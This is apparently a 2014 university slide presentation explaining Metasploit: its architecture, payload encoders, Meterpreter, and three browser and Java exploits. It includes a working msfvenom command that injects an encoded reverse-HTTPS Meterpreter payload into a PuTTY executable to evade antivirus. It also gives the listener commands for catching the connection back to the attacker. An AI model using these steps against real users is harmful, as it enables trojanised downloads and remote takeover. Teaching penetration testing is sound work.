Using

Metasploit

PaulNechifor

Faculty of Computer Science

17 January 2014

Agenda

  • Overview
  • Injected PuTTY
  • IE8 Heap Spray
  • Web Scan & Java break-in
  • Java Sandbox Break-out
  • Conclusions

History

2003 –created by H.D. Moore
2007 –rewritten in Ruby (from Perl)
2009 –acquired by Rapid7 (still under BSD license)

What is it?

  • a framework (collection of tools and resources)
  • used for penetration testing (pentesting)
  • runs on Unices and Windows
Metasploit architecture

Interfaces

  • Metasploit Framework (command line)
  • Metasploit Community (web based)
  • Metasploit Express & Pro (commercial web based)
  • Armitage (GUI)
mfsconsole

Auxiliary Modules

  • Used for scanning, fuzzing, sniffing and others
  • Scanning example:
    • Locating the Tomcat Server administration panel.
    • FTP servers with anonymous access.
    • Bruteforce SSH servers.
    • Servers for capturing credentials for POP3, SMB, FTP, etc.

Rex library

  • Independent classes and modules that provide the features necessary for the rest of the system like:
    • generating assembly instructions programmatically for certain architectures;
    • support for useful protocols like HTTP, SMB;
    • encoding;
    • Opcode Database interaction, etc.

Basics

vulnerability → exploit → payload

Exploits

  • Active:
    • Run against a specific host.
    • Example: against a server running badly configured or vulnerable software.
  • Passive:
    • Waiting on connections from victims.
    • Example: publishing a injected file, serving Java/Flash exploits on HTTP.

Injected PuTTY

Scenario

  • The bad guy hosts a mirror of PuTTY which contains injected code.
  • He listens for connections from a specific machine.
  • The victim is running any recent Windows.

Let's analyze!

Injecting encoded payloads

# Downloading the latest PuTTY.
  wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
  msfvenom \
  -p windows/meterpreter/reverse_https `# The payload.`\
  -e x86/shikata_ga_nai `# Encode with Shikata ga nai...`\
  -i 25 `# ...using 25 iterations.`\
  -f exe `# Output as a Windows EXE file.`\
  -k `# Inject as a new thread (preserves the template behaviour.)`\
  -x ./putty.exe `# Using PuTTY as a template.`\
  LHOST=192.168.1.102 `# The IP to connect back to (this machine).`\
  LPORT=443 `# Default HTTPS port (inconspicuous).`\
  > putty_bad.exe `# The output file.`
  python - SimpleHTTPServer 80

msfpayload

Generates all the types of shellcodes.

msfencode

Encodes binary code in order to evade anti-viruses and get rid of bad characters.

msfvenom

The combination these two tools.

How supicious is this?

  • Virustotal is a free service which scans files using multiple anti-viruses.
  • Using it, 7 of 48 anti-viruses detect the encoded injected payload.
  • But they all say something different!
  • They heuristically detect that something is suspicious, but not the specific threat.

Listening for victims

$ msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lport 443
set lhost 192.168.1.102
exploit

And now wait...

Let's analyze more closely.

Structure of injected file

Basic malware:

Polymorphic malware:

Why encode the payload?

  • The transmission protocol or the vulnerable application may be sensitive to certain data.
  • A payload is usually encoded to make sure it can pass through and not break.
  • A common bad character is a null byte since it limits C strings.
  • The stub is usually very small.

Types of encoding

  • polymorphic / non-polymorphic
  • alphanumeric / non-alphanumeric

Polymorphic:

  • DWORD_XOR Encoder (15+4 bytes): Uses a random 4 byte key.,
  • Countdown Encoder (12+0 bytes): XORs the shellcode depending on a increasing register.
  • FNSTENV_MOV Encoder (15+4 bytes): Uses the floating point unit (FPU) environment.
  • Jmp_call_additive encoder (21+4 bytes): Every DWORD is encoded with a different key depending on the previous decoding.

DWORD_XOR Encoder (source)

 Rex::Arch::X86.sub(-(((state.buf.length - 1) / 4) + 1), Rex::Arch::X86::ECX,
        state.badchars) +
      "\xe8\xff\xff\xff" + # call $+4
      "\xff\xc0"         + # inc eax
      "\x5e"             + # pop esi
      "\x81\x76\x0eXORK" + # xor [esi + 0xe], xork
      "\x83\xee\xfc"     + # sub esi, -4
      "\xe2\xf4"           # loop xor

Shikata ga nai

  • A Japanese expression meaning “it cannot be helped”.
  • A.k.a. Polymorphic XOR Additive Feedback Encoder.
  • The best rated encoder. Highly polymorphic. Difficult to understand.

Payloads

  • That is not the full payload!
  • Self contained payloads are more stable, but usually too big.
  • Windows Meterpreter is 700 kB.
  • So payloads are sent in stages.
  • The included code only contains the stager.
  • (Windows provides the WinINet library that makes it easy to grab content from any URL thus keeping the stager small.)

Stager

  • Establishes a connection to the attacker and processes further stages.

Reverse HTTPS Stager

  • Tunnels communication over HTTP using SSL.
  • Advantages:
    • HTTPS over port 443 is permitted in even in corporate environments.
    • Inner traffic cannot be analyzed.
    • HTTP doesn't maintain a TCP session.

Reflective DLL injection

  • A technique for loading code which provides a reflective loader function.
  • The initial code downloads more stages directly into memory (by any means: raw sockets, HTTPS etc).
  • The reflective loader allocated Read-Write-Execute memory and constructs the executable code there.
  • The code can be used as any other library.
  • Advantages: hard to detect. Languages like Java use JIT compilation to write code in memory and execute it.

Some payloads:

  • PassiveX: circumvents firewalls by using an ActiveX control to create a hidden IE instance which can communicate freely with the attacker.
  • NoNX: bypasses the no-execute bit implementation in Windows (Data Execution Prevention).
  • Meterpreter: the biggest and most powerful payload.

Meterpreter

  • Stealthily loaded into the memory of the process without writing to disk.
  • It can spawn and migrate to other processes.
  • Uses encrypted communication by default.
  • Can be extended at runtime by loading other DLLs.

Meterpreter Features

  • cat, cd, ls, pwd, ipconfig, ps: What you expect
  • edit: Edit files using Vim. (cuz Emacs sux!)
  • download, upload: get and send to the victim's system.
  • execute: run a command
  • hashdump: get the SAM database (passwords file).
  • migrate: migrate to another process.
  • shell: get a standard shell (like cmd).
  • webcam_snap: take a webcam picture.
  • Other things: capture keyboard, microphone; generate clicks and keystrokes...

IE8 Heap Spray

Details

  • A HTML+JS memory corruption bug in IE 8.
  • Requires certain libraries to work: JRE for Windows XP SP3, Vista SP2 and 7 SP1; or Visual C++ Runtime for XP SP3.
  • Reason: IE doesn't sanitize user-supplied input when handling same ID property.
  • Uses a JS lib for heap feng shui.
    • Manipulates the heap layout by making heap allocations.
    • Depends on the specific platforms. Here: IE and Windows.

Heap spraying

  • Fills large amounts of memory with the shellcode and NOP sleds in order to get the right locations.
  • It tries to compensate for the non-determinism of induced by time, chance alignments and other factors.
  • Takes advantage of the fact that heap allocations are usually sequential.

Idea

  • The HTML page contains two elements with the same id (say idName)
  • The memory is sprayed with the shellcode.
  • Mouse events are triggered in which one element is deleted.
  • The ID is referenced using eval('idName'). (It's supposed to return the element.)

Web Scan & Java break-in

Details

  • Takes advantage of the Java RMI Server default config.
  • (An active exploit.)
  • Java Remote Method Invocation is a OOP RPC.
  • The default config allows loading classes from any remote HTTP location.
  • Bytecode Advantage(TM pending): the vulnerability works reliably across 5 different platforms and 3 architectures.
  • RMI method calls don't do any authentication.

Java Sandbox Break-out

  • Affects Oracle Java versions prior to 7u25.
  • Runs from an applet and escapes the Java sandbox through memory corruption bug.
  • It's caused by invalid array indexing in the storeImageArray() function on the native jre/bin/awt.dll.
  • This code calls storeImageArray and causes the coruption:
  • new AffineTransformOp(new java.awt.geom.AffineTransform(1,0,0,1,0,0), null);
?Discovered through the Packet Storm Bug Bounty program.
18.06.2013 Fixed by Oracle.
11.08.2013 Disclosed.
15.08.2013 Implemented in Metasploit.

Conclusions

  • Metasploit is the most successful such framework.
  • Considered the de facto exploit development framework.

Others

  • w3af: less general than Metasploit.
  • Core Impact: best competitor, but not free.

Prevention (usual stuff)

  • Use up to date software.
  • Security through obscurity:
    • Configure software to not give its identity and version.
    • Use non-default ports.
  • Don't pass sensitive date through insecure channels (e.g.: FTP, telnet).

Sources

http://www.offensive-security.com/metasploit-unleashed/
http://en.wikipedia.org/wiki/Metasploit_Project
http://www.exploit-db.com/wp-content/themes/exploit/docs/18532.pdf
http://blog.strategiccyber.com/2013/06/28/staged-payloads-what-pen-testers-should-know/
http://www.rapid7.com/db/modules/exploit/windows/browser/ms12_037_same_id
http://www.rapid7.com/db/modules/exploit/multi/misc/java_rmi_server
http://www.rapid7.com/db/modules/exploit/multi/browser/java_storeimagearray
http://www.osvdb.org/82865
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/browser/ms12_037_same_id.rb
http://www.exploit-db.com/exploits/27526/
http://en.wikipedia.org/wiki/Heap_spraying
https://www.corelan.be/index.php/2011/12/31/exploit-writing-tutorial-part-11-heap-spraying-demystified/
http://www.levinkv.ru/bezopasnost/metasploit/metasploit-penetration-testing-cookbook-%D1%87%D0%B0%D1%81%D1%82%D1%8C-1.html
http://www.harmonysecurity.com/files/HS-P005_ReflectiveDllInjection.pdf

Questions?